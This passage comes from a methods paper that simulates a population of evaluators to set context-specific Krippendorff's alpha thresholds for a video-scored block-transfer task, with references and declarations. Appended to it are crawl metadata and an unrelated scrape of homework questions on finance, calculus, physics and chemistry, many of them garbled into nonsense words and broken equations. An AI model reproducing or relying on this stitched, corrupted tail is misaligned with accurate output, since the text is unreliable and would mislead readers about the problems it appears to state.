errors were not important. We were interested in the total error of the 50 timing events from the speed phase, so we quantified the percent error of total time of those events. Using the error measurements of this subset provided the worst-case baseline to sufficiently capture the percent error for the most difficult aspects of the task. Also, we were not concerned with the direction of the error (i.e., whether it was negative or positive, relative to the reference value), only the magnitude of the error, so absolute value of percent error was used. It is important to understand that this described procedure for calculating error is not inherent to the methodology; it is an idiosyncrasy of the task that we are using to demonstrate the methodology. For another task, it may be more appropriate to use total error, root mean squared error, or some other calculation to quantify the error of an evaluator. We constructed the model for this task using the Krippendorff’s alpha and percent error calculations.\n\n### Model assessment\n\nWe wanted to verify that our model accurately described the relationship between the agreement and error of actual human evaluators, and also demonstrate the applicability of the model in a real-world scenario. We first fit a curve (y = − 0.637x1.76 + 1, r2 = 0.999; the curve was created using Igor Pro v 6.36 Curve Fitting function; WaveMetrics, Portland, OR) to the model, using the data points of simulated evaluators who defined the envelope, to mathematically define what would be the “worst-case” percent error for any given Krippendorff’s alpha value (see Results). A power law was chosen for the curve fit as it provided a high r2 for the envelope, over the range of data that we were interested in. This is, again, a facet of the methodology that is dependent on the evaluator task; our methods are generalizable to allow any form of curve fitting. We then compared the results of the hypothetical modeling to an actual population of evaluators to demonstrate that the model values reflect the values actually generated by human evaluators. To do this, we assigned the video analysis task to a new cohort of trained human evaluators (n = 5). We used the reference dataset from our panel of expert evaluators (described above) as a standard of comparison and calculated Krippendorff’s alpha and percent error values for each of the human evaluators to verify their compliance to the model.\n\nSince the test data that were used to generate the model were also the same data that the evaluators were scoring, it was a concern that any comparisons between the evaluators and the model were circular and not generalizable to new instances of the test. To explore this idea we repeated all of the simulation steps using a new scoring video of a different anonymous participant taking the same test, scored by a new evaluator. All error step-sizes, error calculations, and agreement calculations were methodologically identical to the original simulation described in “Quantitative example”. We again plotted the results of the human evaluators from the original video analysis, to see if they were still well-explained by the new model, as well as fit a curve to the new envelope (y = − 0.6251x1.685 + 1.001, r2 = 0.9998) to determine if there was any change between the two models in the mathematical relationship between agreement and error.\n\n## Results\n\nThe Krippendorff’s alpha values for the 4900 hypothetical datasets ranged from 0.998 to 0.854 and the percent error values ranged from 0 to 39.4%. Figure 3 shows the average Krippendorff’s alpha and average percent error of all 49 (averaged) simulated evaluators, with the size and shading of the markers representing the random error and systematic error parameters, respectively. For our evaluator task an increase in systematic error was correlated to an increase in percent error (Pearson’s r = 0.997, p < 0.001), whereas random zero-mean error did not correlate to an increase percent error (Pearson’s r = − 0.025, p = 0.865). This was a result of our task being specifically concerned with average percent error; simulated evaluators with zero-mean random error produced modest percent error when averaged over many trials. As seen in Fig. 3, this result was also evidenced by darker circles falling farther to the right with larger circles of the same color aligning vertically. As mentioned above, flooring our measurements to 0.033 s introduced a small amount of systematic error into simulated evaluators who were prescribed low systematic error and high random error. This can be seen in Fig. 3 as the markers with increasing random error are staggered to the right when systematic error is low. This deviance was not a concern for our specific investigation as we were only interested in the envelope of the model.\n\n### Model assessment\n\nTo verify that our model accurately described the evaluator agreement and measurement error relationship of actual human evaluators, we plotted the Krippendorff’s alpha and percent error values collected from our human evaluators against the performance of the simulated evaluators. We found that the results of the human evaluators fell within the envelope defined by the simulated evaluator performance (Fig. 4).\n\nFigure 5 shows the model created using the results of the new trained evaluator analyzing this new instance of the block moving task. The original fit from the model in Fig. 4 still provides an accurate description of the Krippendorff’s alpha and percent error relationship (r2 = 0.991). The lighter dotted line is the new fit (y = − 0.6251x1.685 + 1.001, r2 = 0.9998) and is provided for comparison. The two models are highly similar, and are nearly identical when considering percent error of 10% or less. Both models show high agreement and low error for the tightly clustered six evaluators, who would pass any of the example Krippendorff’s alpha thresholds presented, and one evaluator who has relatively low agreement and excessively high error that would not pass any of the thresholds.\n\n## Discussion\n\nWhen measuring agreement between evaluators, a decision about what constitutes an acceptable level of agreement must be made. Historically, interpreting an agreement measure was ambiguous, as the practical implications of choosing one threshold over another were not well-defined. This led to general use of a 0.8 “rule of thumb” value as a threshold, though several works have suggested that this cut-off is not likely suitable for all studies [4, 10, 13,14,15,16]. To address this issue, we developed a systematic approach to arrive at a relevant context-specific reliability threshold, bridging the gap between reliability indices and the error inherent to the test construct of interest. Our approach simulated the results of a large population of evaluators. In our quantitative example, these simulated evaluators “judged” a video analysis task. Our method injected known tendencies for making systematic and random errors, and calculated the agreement (Krippendorff’s alpha in our example) and the error (percent error in our example) between the simulated data and a reference dataset. This procedure allowed us to relate agreement, which is customarily measured in reliability studies, to the amount of error from the “true” values, which is more salient but typically unavailable. In our example, we found that an envelope existed which defined the maximum observed percent error for any given value of Krippendorff’s alpha. We characterized this envelope and determined its effectiveness and generalizability.\n\nDuring the evaluation of our quantitative example, we found that the results of the human evaluators adhered to the derived threshold envelope and were similar to those obtained from the simulated data (Fig. 4). As evidenced through this quantitative example, these findings support that our proposed techniques have the power to facilitate meaningful interpretations of reliability indices in a relevant context of measurement error. An additional characteristic of our quantitative example is highlighted in Fig. 6. Here, the contour plots, generated using the simulated datasets, show Krippendorff’s alpha (left) and percent error (right) values for the investigated combinations of systematic error and random error. It was demonstrated that an increase in either systematic error or random error can lead to a decrease in agreement (lower Krippendorff’s alpha), whereas percent error (the “functional value”), on average, is only affected by systematic error. This is due to the mathematical nature of random observational errors (and thus how they were modeled), as they are described by symmetrical deviations with no net change from the mean of a Gaussian distribution; therefore, they average to zero over many trials . This contour plot format can be more generally applied to other reliability indices or measures of errors to illustrate the consequences of observational errors.\n\nFinally, the data highlighted in Fig. 5 were generated from a new participant being scored by a new evaluator to verify the generalizability of our techniques. The only observed difference between this newly generated model and the original was that the contour plots (not shown) of Krippendorff’s alpha and percent error were compressed, as the values from the second test were, on average, numerically smaller than the first test. This means that systematic error and random error had relatively greater effects on Krippendorff’s alpha and percent error. Regardless, the Krippendorff’s alpha and percent error relationship generated by this model remained a valid and useful way to assess evaluator reliability in this video analysis task. This was evidenced by re-plotting the human evaluators on the new model, as they fell within similar error and agreement thresholds as the original model (Fig. 5). These data suggest that once a relationship between a selected reliability index and functional measure has been established, that result is generally applicable to any instance of that same test, scored by any cohort of evaluators, without need to revisit the model.\n\nThis example demonstrates the use of our systematic procedure to both investigate the consequences of different agreement thresholds and provide a framework for researchers to make informed decisions about reliability in their evaluator-based tests. Modeling a large population of evaluators with a variety of prescribed probabilities for making mistakes and then calculating their resulting error allowed us to describe our chosen agreement measure in the context of how the data would be used practically. In our example, we generated a standard of comparison for this specific instance of our test by employing a group of expert evaluators. Comparing the experts’ results to the trained evaluators’ results revealed practicable levels of agreement and the error associated with that agreement. We found that high levels of agreement (0.99 and up) were regularly achieved and afforded error of no greater than 5%. Using our model as a frame of reference we concluded that a Krippendorff’s alpha threshold of 0.985 should be used for this task to permit error no greater than 12% while not being so strict as to potentially throw out useful data. It is critical to note that the conventional 0.8 rule of thumb threshold would have been egregiously permissive in our quantitative example, further reinforcing the need for application-specific agreement thresholds.\n\nA key strength of our methodology is its high level of customizability which greatly expands its scope and utility. This procedure should be applicable to most any agreement measure or evaluator-based task, and may be uniquely tailored to emphasize the important aspects of the task or to reflect how the data will be used in practice. The investigator may choose the step-size of the simulated evaluators’ errors and the approach for calculating error (using percent error or a different error calculation entirely, calculating error on individual values or averages values, etc.) beforehand, based on the specific needs of that test. Additionally, the investigator is able to decide how the “true” or reference data that are used for calculating agreement and error are defined or generated. It should be noted that the presence of true or even presumably-true values are not necessary for using this method, and the values used to generate the model are not even required to be actual results from the specific test of interest. The only requirement for these reference data is that they are representative of the types of values resulting from an evaluator judging the specific test. In our quantitative example, the error step-size was chosen to be the resolution of the measurements of the test (based on the video frame rate). We used percent error calculations from a subset of the measurements which represented a particular metric of interest. We determined this metric to be most sensitive to error so using it for our calculations provided us with a worst-case percent error for any given level of agreement. The “true” or reference values were established by averaging together the results of the expert evaluators.\n\nOur methodology may provide a useful framework for establishing agreement benchmarks in evaluator-based tests, and could be adapted for application in other contexts. For example, the reliability of clinical tests which require human evaluation is a major concern. The accuracy and validity of these types of assessments could be improved by using our methodology. To implement our methods more generally into a clinical context (or other evaluator-based applications), a possible approach would be first building a “true” or reference set of measurements for a typical application of the test. A baseline panel of expert evaluators could be employed to generate the reference measurement(s) for that particular application. Modeling a simulated evaluator population from this dataset would establish an agreement-error relationship that could be used as a “grading scale,” to relate evaluator quality (inter-evaluator reliability) and measurement error, that would generally apply in any instance of that test. This process would only need to be performed once, and the resulting scale could then be incorporated into training programs for new evaluators or used to periodically assess groups of existing evaluators as a measure of quality control.\n\nPerhaps the biggest limitation of this work is that the models generated are inherently more accurate when the reference data are of similar numerical magnitude to the data typically obtained from the testing procedure. Although a “one size fits all” solution would be ideal, multiple models may be necessary if the results of the evaluator task vary greatly. For instance, in our quantitative example, video footage of a healthy participant transferring objects with their upper limbs was scored. If this task were performed with a sensorimotor-impaired participant, where scores would be anticipated to differ significantly from healthy performance, it may be necessary to generate a new model built from reference data that are more reflective of the anticipated sensorimotor-impaired results. Further work could be done to investigate the consistency of models over different ranges of numerical values and how, and to what extent, the models diverge from the data. This methodology could potentially reveal strengths and weaknesses of different reliability indices and possibly inform the selection of an appropriate agreement measure. Our approach of using zero-mean random error may present as a limitation as it is an idealized circumstance. This zero-mean approach could perhaps be replaced with a more nuanced approach exploring the skew and kurtosis of error distributions to potentially reveal additional findings. Skew and kurtosis may have the potential to model more peculiar erroneous evaluator behavior, such as heavy-tailed outlier data, which could be approximated by increased kurtosis. A particularly troublesome example would be an evaluator who occasionally selects extreme values in an asymmetric fashion to intentionally bias the outcome of an evaluation. Our methodology could be used to model what this behavior looks like from a reliability perspective, to help detect and mitigate this type of behavior in the field.\n\nThis work aims to provide a generalizable procedure, yet datasets in evaluator-based scoring activities may be diverse in size, variability, and data type. Thus, it is not feasible to devise a universal procedure which can accommodate all possible variants of reliability data. As such, each individual application of this methodology requires the discretion of the investigator. Furthermore, this method could reasonably apply to many data types (e.g., nominal, interval, ratio), error measurements (e.g., percent error, RMS error, mean absolute error), and reliability indices (e.g., Cohen’s κ, Scott’s π, Krippendorff’s α). We suggest that the quantitative basis of this method represents an improvement over rule of thumb conventions for interpreting reliability indices.\n\n## Conclusion\n\nBy simulating a population of evaluators with predetermined probabilities for making mistakes, we have explored correlations between evaluator reliability indices and functional test values of interest. We demonstrate this method using a quantitative example to derive a relationship between Krippendorff’s alpha and percent error. Through this simulation and modeling we assessed the quality of our human evaluators based on their alpha coefficients. We propose that this is a reasonable technique for establishing agreement thresholds to identify suitable evaluators and this technique could be expanded for use in other evaluator-based tests, or with different agreement and/or error measurements.\n\n## References\n\n1. 1.\n\nFeng GC. Factors affecting intercoder reliability: a Monte Carlo experiment. Qual Quant. 2013;47:2959–82.\n\n2. 2.\n\nAntoine J-Y, Villaneau J, Lefeuvre A. Weighted Krippendorff’s alpha is a more reliable metrics for multi-coders ordinal annotations: experimental studies on emotion, opinion and coreference annotation. In: Proc 14th Conf Eur Chapter Assoc Comput Linguist; 2014. p. 550–9. http://www.aclweb.org/anthology/E14-1058.\n\n3. 3.\n\nKrippendorff K. Content analysis: an introduction to its methodology. Beverly Hills: Sage Publications; 1980.\n\n4. 4.\n\nCraggs R, Wood MM. Evaluating discourse and dialogue coding schemes. Comput Linguist. 2005;31:289–96.\n\n5. 5.\n\nHayes AF, Krippendorff K. Answering the call for a standard reliability measure for coding data. Commun Methods Meas. 2007;1:77–89. https://doi.org/10.1080/19312450709336664.\n\n6. 6.\n\nOleinik A, Popova I, Kirdina S, Shatalova T. On the choice of measures of reliability and validity in the content-analysis of texts. Qual Quant. 2014;48:2703–18.\n\n7. 7.\n\nKrippendorff K. Agreement and information in the reliability of coding. Commun Methods Meas. 2011;5:93–112.\n\n8. 8.\n\nBartlett JW, Frost C. Reliability, repeatability and reproducibility: analysis of measurement errors in continuous variables. Ultrasound Obstet Gynecol. 2008;31:466–75.\n\n9. 9.\n\nLombard M, Snyder-Duch J, Bracken CC. Content analysis in mass communication: assessment and reporting of Intercoder reliability. Hum Commun Res. 2002;28:587–604.\n\n10. 10.\n\nKrippendorff K. Reliability in content analysis: some common misconceptions and recommendations. Hum Commun Res. 2004;30:411–33.\n\n11. 11.\n\nBanerjee M, Capozzoli M, McSweeney L, Sinha D. Beyond kappa: a review of interrater agreement measures. Can J Stat. 1999;27:3–23. https://doi.org/10.2307/3315487.\n\n12. 12.\n\nZwick R. Another look at interrater agreement. Psychol Bull. 1988;103:374–8.\n\n13. 13.\n\nArtstein R, Poesio M. Inter-coder agreement for computational linguistics. Comput Linguist. 2008;34:555–96. https://doi.org/10.1162/coli.07-034-R2.\n\n14. 14.\n\nCarletta J, Carletta J, Computational I, Computational I. Squibs and discussions assessing agreement on classification tasks: the kappa statistic. Comput Linguist. 1993;22:248–54.\n\n15. 15.\n\nEugenio BD, Glass M. The kappa statistic: a second look. Comput Linguist. 2004;30:95–101. https://doi.org/10.1162/089120104773633402.\n\n16. 16.\n\nReidsma D, Carletta J. Reliability measurement without limits. Comput Linguist. 2008;34:319–26. https://doi.org/10.1162/coli.2008.34.3.319.\n\n17. 17.\n\nWilhelm AG, Rouse AG, Jones F. Exploring differences in measurement and reporting of classroom observation inter-rater reliability. Pract Assess Res Eval. 2018;23:1–16.\n\n18. 18.\n\nStilma W, Rijkenberg S, Feijen H, Maaskant JM, Endeman H. Validation of the Dutch version of the critical-care pain observation tool. Br Assoc Crit Care Nurses. 2015; Epub ahead of print.\n\n19. 19.\n\nvan Veen MJ, Birnie E, Poeran J, Torij HW, Steegers EAP, Bonsel GJ. Feasibility and reliability of a newly developed antenatal risk score card in routine care. Midwifery. 2015;31:147–54. https://doi.org/10.1016/j.midw.2014.08.002.\n\n20. 20.\n\nRohan KJ, Rough JN, Evans M, Ho SY, Meyerhoff J, Roberts LM, et al. A protocol for the Hamilton Rating Scale for Depression: item scoring rules, rater training, and outcome accuracy with data on its application in a clinical trial. J Affect Disord. 2016;200:111–8. https://doi.org/10.1016/j.jad.2016.01.051.\n\n21. 21.\n\nSwanton AR, Arlen AM, Alexander SE, Kieran K, Storm DW, Cooper CS. Inter-rater reliability of distal ureteral diameter ratio compared to grade of VUR. J Pediatr Urol. 2017;13:207.e1–207.e5. https://doi.org/10.1016/j.jpurol.2016.10.021.\n\n22. 22.\n\nWikstrom EA, Allen G. Reliability of two-point discrimination thresholds using a 4-2-1 stepping algorithm. Somatosens Mot Res. 2016;33:156–60.\n\n23. 23.\n\nDe Groef A, Van Kampen M, Vervloesem N, Clabau E, Christiaens MR, Neven P, et al. Inter-rater reliability of shoulder measurements in middle-aged women. Physiother apy. 2017;103:222–30. https://doi.org/10.1016/j.physio.2016.07.002.\n\n24. 24.\n\nKvistgaard Olsen J, Fener DK, Wæhrens EE, Wulf Christensen A, Jespersen A, Danneskiold-Samsøe B, et al. Reliability of pain measurements using computerized cuff algometry: a DoloCuff Reliability and Agreement Study. Pain Pract. 2017;17:708–17.\n\n25. 25.\n\nSaito Y, Sozu T, Hamada C, Yoshimura I. Effective number of subjects and number of raters for inter-rater reliability studies. Stat Med. 2006;25:1547–60.\n\n26. 26.\n\nWalter SD, Eliasziw M, Donner A. Sample size and optimal designs for reliability studies. Stat Med. 1998;17:101–10.\n\n27. 27.\n\nTaylor JR. An introduction to error analysis the study of uncertainties in physical measurments. 2nd ed. Sausalito: University Science Books; 1997.\n\n28. 28.\n\nHahn GJ. Sample sizes for Monte Carlo simulation. IEEE Trans Syst Man Cybern. 1972;2:678–80.\n\n29. 29.\n\nCassettari L, Mosca R, Revetria R. Monte Carlo simulation models evolving in replicated runs: a methodology to choose the optimal experimental sample size. Math Probl Eng. 2012;2012:1–17.\n\n30. 30.\n\nKrippendorff K. Computing Krippendorff’s alpha-reliability. Dep Pap. 2011;1–12. https://repository.upenn.edu/cgi/viewcontent.cgi?article=1043&context=asc_papers.\n\n31. 31.\n\nFreelon D. ReCal OIR: ordinal, interval, and ratio intercoder reliability as a web service. Int J Internet Sci. 2013;8:10–6. http://www.ijis.net/ijis8_1/ijis8_1_freelon.pdf.\n\n## Acknowledgments\n\nWe thank Jon Sensinger for input on the manuscript.\n\n### Funding\n\nThis project utilized block transfer metrics and video footage that was developed with funding from the US taxpayers through Defense Advanced Research Projects Agency (DARPA) contract number N66001–15-C-4015 under the auspices of Biology Technology Office (BTO) program manager Doug Weber.\n\n### Availability of data and materials\n\nAll relevant data are contained within the paper and are freely available without restriction.\n\n## Author information\n\nAuthors\n\n### Contributions\n\nDTB contributed to data collection and analysis. ZCT and PDM contributed to analyses. All authors contributed to writing the manuscript. All authors read and approved the final manuscript.\n\n### Corresponding author\n\nCorrespondence to Paul D. Marasco.\n\n## Ethics declarations\n\n### Ethics approval and consent to participate\n\nThis modeling project was undertaken to improve internal processes for establishing reliability of evaluators and deemed not subject to IRB review. The block transfer metrics and video footage of fully consented study participants were covered by Cleveland Clinic IRB approved study 13–1349 Sensory Feedback Tactor Systems for Implementation of Physiologically Relevant Cutaneous Touch and Proprioception with Prosthetic Limbs.\n\n### Consent for publication\n\nInformed consent for the Cleveland Clinic IRB approved study 13–1349 Sensory Feedback Tactor Systems for Implementation of Physiologically Relevant Cutaneous Touch and Proprioception with Prosthetic Limbs includes consent for publication.\n\n### Competing interests\n\nThe authors declare that they have no competing interests.\n\n### Publisher’s Note\n\nSpringer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.\n\n## Rights and permissions",
null,
""
] | [
null,
"https://bmcmedresmethodol.biomedcentral.com/track/article/10.1186/s12874-018-0606-7",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.9055183,"math_prob":0.8871007,"size":53936,"snap":"2020-45-2020-50","text_gpt3_token_len":10962,"char_repetition_ratio":0.17141956,"word_repetition_ratio":0.02684729,"special_character_ratio":0.20285153,"punctuation_ratio":0.11902298,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95063394,"pos_list":[0,1,2],"im_url_duplicate_count":[null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-25T11:26:20Z\",\"WARC-Record-ID\":\"<urn:uuid:95c6407d-fdcd-49cf-a3ed-a2e031eb4af0>\",\"Content-Length\":\"264393\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:96ffa30e-c741-4118-a14d-c84d0d3bf081>\",\"WARC-Concurrent-To\":\"<urn:uuid:6a3a1ca0-e489-4b26-8cf0-c1f840dea7dd>\",\"WARC-IP-Address\":\"199.232.64.95\",\"WARC-Target-URI\":\"https://bmcmedresmethodol.biomedcentral.com/articles/10.1186/s12874-018-0606-7\",\"WARC-Payload-Digest\":\"sha1:FIWNTTELCGX7NFSALUAO3ILH5JJ6YXLP\",\"WARC-Block-Digest\":\"sha1:HDZJO7AB7JZKDJVIWWUVCV4PXFROLJWL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107888931.67_warc_CC-MAIN-20201025100059-20201025130059-00259.warc.gz\"}"} |
https://solvedlib.com/n/2-points-a-drug-x27-concentration-in-a-patient-x27-s-blood,8408817 | [
"The number of \"destination weddings\" has skyrocketed in recent years. For example, many couples are opting to have their weddings in the Caribbean. A Caribbean vacation resort recently advertised in Bride Magazine that the cost of a Caribbean wedding was less than $30,000. Listed below is ... 1 answer ##### (14) 1. This problem investigates the iterated integral I - Jxdy dz. . a) Compute I. b) Use the a... Please show all work thanks (14) 1. This problem investigates the iterated integral I - Jxdy dz. . a) Compute I. b) Use the axes to the right to sketch the region of integration for I c) Write I as a sum of one or more dz dy integrals. You do not need to compute the result! 4 (10) 2. Find and classi... 5 answers ##### Question 5) (20 Points) a) Given the vectors 4 =3i-j +kand B = 2i - 3j + k Calculate the product A x B and verify that this vector is Orthogonal to A vector and to B vector. Also find B x A and compare it with AxB_6)4=(-3,4,0),B=(3,6,3) and C = (-1,2,1) are the three vertices of a triangle Calculate the cosine of each of the three angles in the trtangle Calculate the area of the triangle Question 5) (20 Points) a) Given the vectors 4 =3i-j +kand B = 2i - 3j + k Calculate the product A x B and verify that this vector is Orthogonal to A vector and to B vector. Also find B x A and compare it with AxB_ 6)4=(-3,4,0),B=(3,6,3) and C = (-1,2,1) are the three vertices of a triangle Calculat... 1 answer ##### Could someone help me out. I am not sure what I should be doing. Seeing it... Could someone help me out. I am not sure what I should be doing. Seeing it worked out will allow me to understand what I should be doing and then I can complete it on my own. Usando 2. Complete the Dog Class: a. Using the UML Class diagram to the right declare the instance variables. A t... 1 answer ##### “Should individuals and small businesses run their own accounts, or should they leave it to the... “Should individuals and small businesses run their own accounts, or should they leave it to the professionals?”... 1 answer ##### Determine the amplitude, period, and phase shift of each function. Then graph one period of the function. $y=\\frac{1}{2} \\cos \\left(3 x+\\frac{\\pi}{2}\\right)$ Determine the amplitude, period, and phase shift of each function. Then graph one period of the function. $y=\\frac{1}{2} \\cos \\left(3 x+\\frac{\\pi}{2}\\right)$... 5 answers ##### If 2 =-1+ V3i find the value of (22 using De Moivre's Theorem: If 2 =-1+ V3i find the value of (22 using De Moivre's Theorem:... 5 answers ##### 9. 2t) In2 In 10. n=] n + 12 I\" 11. n=1 (3n)!(33 ~ 1)n 12. n2 + 2 n=l 9. 2t) In 2 In 10. n=] n + 1 2 I\" 11. n=1 (3n)! (33 ~ 1)n 12. n2 + 2 n=l... 1 answer ##### My question relates to Example 2.4, Section 3 (The Harmonic Oscillator) in the textbook Introduction to... My question relates to Example 2.4, Section 3 (The Harmonic Oscillator) in the textbook Introduction to Quantum Mechanics by DavidJ. Griffiths. My problem is with the normalization of of the following equation: |A|^2 \\sqrt{\\frac{m\\omega}{\\pi\\hbar} (\\frac{2m\\omega}{\\hbar})\\int_{-infty}^\\infty x^2 e^\\... 5 answers ##### Chapter Sactlon 0.2, Quastion 087 Fipd antadetivativc Tor 9() 2sin< ~ sin(2c)= Aacac dilcrentiation chkrk Your LaswctRcrcmbct cuclor argutricnt, for tnporoneinc Iunctlona Paichthasi; Ind utc Tw mulplicutic'n Ixtwte Icnn: For ctleple _ nnul 3an_ Su J\"din(3t,An muikknvilnvc / Qt) Chapter Sactlon 0.2, Quastion 087 Fipd antadetivativc Tor 9() 2sin< ~ sin(2c)= Aacac dilcrentiation chkrk Your Laswct Rcrcmbct cuclor argutricnt, for tnporoneinc Iunctlona Paichthasi; Ind utc Tw mulplicutic'n Ixtwte Icnn: For ctleple _ nnul 3an_ Su J\"din(3t, An muikknvilnvc / Qt)... 1 answer ##### 1. (Bonds) A zero-coupon bond has a$1,000 par value, 10 years to maturity, and sells...\n1. (Bonds) A zero-coupon bond has a $1,000 par value, 10 years to maturity, and sells for$583.89. What is its yield to maturity? Assume annual compounding. Record your answer to the nearest 0.01% (no % symbol). E.g., if your answer is 3.455%, record it as 3.46. 2. (Stocks) A stock with the required...\n##### Kaecn pulled Aloni the Broundat con tantspeed (static €qullibrium) vl opc uelcd M 32\" above ua Uueee bonron5n belng pulled wlth 1P0 N the coctficient = klnetic Iriction 0,87.whal [s thie mwenllude 0l thc torce & uchrane0n0nS07NO5N0 502N\nKaecn pulled Aloni the Broundat con tantspeed (static €qullibrium) vl opc uelcd M 32\" above ua Uueee bonron5n belng pulled wlth 1P0 N the coctficient = klnetic Iriction 0,87.whal [s thie mwenllude 0l thc torce & uchrane 0n 0n S07N O5N 0 502N...\n##### 15. Let the supply and demand of radial tires be given by: supply: p and demand:...\n15. Let the supply and demand of radial tires be given by: supply: p and demand: p 81- a) Find the equilibrium quantity. 2 b) Find the equilibrium price...\n##### 3.2.42 Assigned MediaQuestion HelpBy rewiting the lormula for the Mulliplicatior Rule, you can wnte Iormula Ior linling conditional probabilities The conditional probability ol evert B occurring: given that event A has occurred, I5 P(B| A)- PAA, and Use Ihe intormation below to lind the probability that flight arnves on brrie given that it departed P(A) on timneThe probabllity that an airplane flight departs on tirre I5 0 89 The probability thal a flight arnives on time I5 0 86. The probab lity\n3.2.42 Assigned Media Question Help By rewiting the lormula for the Mulliplicatior Rule, you can wnte Iormula Ior linling conditional probabilities The conditional probability ol evert B occurring: given that event A has occurred, I5 P(B| A)- PAA, and Use Ihe intormation below to lind the probabilit...\n##### Convert the following DFA to a regular expression. Dead state and transitions to it not shown,...\nConvert the following DFA to a regular expression. Dead state and transitions to it not shown, but remember that the dead state has no outgoing transitions. ...\n##### 3. Compute the cooling load for the south windows of an office building that has no external shad...\n3. Compute the cooling load for the south windows of an office building that has no external shading. The window is regular insulating glass with 1/2 inch air space and Wood/Vinyl frame. Drapes with reflectance of 0.2 and transmittance of 0.5 are fully closed. The total window area is 400ft2. Assume...\n##### In Exercises 5 - 16, determine whether the sequence is geometric. If so, find the common ratio. $7, 21, 63, 189, \\cdots$\nIn Exercises 5 - 16, determine whether the sequence is geometric. If so, find the common ratio. $7, 21, 63, 189, \\cdots$...\n##### 388 I 2 1 L 6 & 3 28 1 8 2 2 1 8 18 3 6 3 1\n388 I 2 1 L 6 & 3 28 1 8 2 2 1 8 18 3 6 3 1...\n##### Please show all work and step by step procedure What is the net force on change...\nplease show all work and step by step procedure What is the net force on change B? F = kq_1 q_2/r_12^2 r_12 k = 1/4 pi epsilon_0 = 8.99 x 10^9 n.m^2/c^2...\n##### (1 point) Findwhenlog(x) 9 + Tog(x)d\n(1 point) Find when log(x) 9 + Tog(x) d...\n##### Find the area of the bounded region lying between the curves y 22 and y 4x x2\nFind the area of the bounded region lying between the curves y 22 and y 4x x2...\n##### That their items have normally distributed lifespan with a mean 0l 14.8 years, and A manufacturer knows standard deviation of years randomly purchase one item, what is the probability it will last (onger than 8 years? You\nthat their items have normally distributed lifespan with a mean 0l 14.8 years, and A manufacturer knows standard deviation of years randomly purchase one item, what is the probability it will last (onger than 8 years? You...\n##### The enthalpy of combustion of CH4(g) to make H2O(l) and CO2(g) is -2340 kJ mol-1. The...\nthe enthalpy of combustion of CH4(g) to make H2O(l) and CO2(g) is -2340 kJ mol-1. The enthalpy of combustion of CH2(g) to make H2O(l) and CO2(g) is -2760 kJ mol-1. The enthalpy of formation of H2O(l) is -286 kJ mol-1. All the data are for 298 K. The heat capacities for O2(g), CHA(8), CH3(g), H2O(l) ...\n##### Background: 100 ms after the participant makes an er investigate whether the ERN is affected The...\nBackground: 100 ms after the participant makes an er investigate whether the ERN is affected The Error-Related Negativity (ERN) is a negative ERP component a negative ERP component that peaks around 80- me participant makes an error Chan Davies & Gavin (2009) Wanted (ADHD). They compared a group...\n##### Find parametric equation for the line through the point (9, 8,6) and perpendicular to the plane 4x + 3y 9z = 13 which is written using the coordinates of the given point and the coefficients of x, Y; and z in the given equation of the plane.(Type expressions using t as the variable.\nFind parametric equation for the line through the point (9, 8,6) and perpendicular to the plane 4x + 3y 9z = 13 which is written using the coordinates of the given point and the coefficients of x, Y; and z in the given equation of the plane. (Type expressions using t as the variable....\n##### (25 pts. Use the Laplace transform to solve the initial value problem: ~4t+3. 0 <t<2 \"\"+4y=f()-{ J(0) =-1, y(0) = 5, t22\n(25 pts. Use the Laplace transform to solve the initial value problem: ~4t+3. 0 <t<2 \"\"+4y=f()-{ J(0) =-1, y(0) = 5, t22...\n##### Id\"F One property of Laplace transforms can be expressed in terms of the inverse Laplace transform...\nId\"F One property of Laplace transforms can be expressed in terms of the inverse Laplace transform as 2-1 (t) = (-t)\"f(t), where f= 2-1{F}. Use this equation to compute 2 - '{F} dsh F(s) = arctan on to Click here to view the table of Laplace transforms. Click here to view the table of pr...\n##### Question 10 Not yet answeredFind the cumulative frequency of tall in the third class boundary? Frequency part of Survey ( Male students tall in ASU Spring 0-21) 25 1 20 15 20 6 10 15 1 MToal 159.5-164.5 164.5-169.5 169.5-174.5 174.5-179.5 179.5-184.5 Hight of studentMarked out of 2.00Flag questionDataAnswer:\nQuestion 10 Not yet answered Find the cumulative frequency of tall in the third class boundary? Frequency part of Survey ( Male students tall in ASU Spring 0-21) 25 1 20 15 20 6 10 15 1 MToal 159.5-164.5 164.5-169.5 169.5-174.5 174.5-179.5 179.5-184.5 Hight of student Marked out of 2.00 Flag questio..."
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8094646,"math_prob":0.9818855,"size":14479,"snap":"2023-14-2023-23","text_gpt3_token_len":4434,"char_repetition_ratio":0.10404145,"word_repetition_ratio":0.51373184,"special_character_ratio":0.30582222,"punctuation_ratio":0.14825307,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99291474,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-07T04:51:35Z\",\"WARC-Record-ID\":\"<urn:uuid:a252654b-6a8f-4917-a418-96c8fb22f7c5>\",\"Content-Length\":\"103953\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ae0e11eb-e88c-4cc2-b78a-f6fe833ee91a>\",\"WARC-Concurrent-To\":\"<urn:uuid:4c833385-aa71-42af-903d-83d9c765074d>\",\"WARC-IP-Address\":\"172.67.132.66\",\"WARC-Target-URI\":\"https://solvedlib.com/n/2-points-a-drug-x27-concentration-in-a-patient-x27-s-blood,8408817\",\"WARC-Payload-Digest\":\"sha1:ILVL4JZO6TWYJGSI5C6DISFUBSJE4EZF\",\"WARC-Block-Digest\":\"sha1:KCHRPGRNDA34JMWXMN5WL423T63TQJWM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224653608.76_warc_CC-MAIN-20230607042751-20230607072751-00753.warc.gz\"}"} |
https://forum.dynare.org/t/how-to-get-asymptotic-covariance-matrix/5759 | [
